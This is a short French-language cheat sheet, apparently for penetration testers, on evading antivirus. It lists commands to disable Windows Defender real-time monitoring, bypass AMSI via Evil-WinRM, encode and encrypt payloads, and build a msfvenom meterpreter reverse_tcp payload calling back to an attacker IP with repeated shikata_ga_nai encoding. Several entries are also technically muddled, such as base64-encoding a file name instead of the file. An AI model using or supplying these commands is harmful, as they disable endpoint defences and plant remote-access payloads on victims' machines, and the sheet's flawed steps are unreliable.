Evasion AV

Powershell

powershell -ep bypass
Set-MpPreference -DisableRealtimeMonitoring $true

Evil-Winrm

# winrm
menu
Bypass-4MSI

Générer un payload encodé en Base64

echo -n "payload.exe" | base64 > payload.b64

Chiffrer un binaire

openssl enc -aes-256-cbc -salt -in payload.exe -out payload_enc.exe -k secret

Changer la signature binaire

mv payload.exe payload.bak && cp payload.bak payload.exe
strip --strip-debug payload.exe

Obfuscation avec msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attaquant_ip> LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > payload.exe

Injection shellcode avec Python

python3 -c 'import sys; shellcode = "\x90\x90..."; sys.stdout.buffer.write(shellcode)'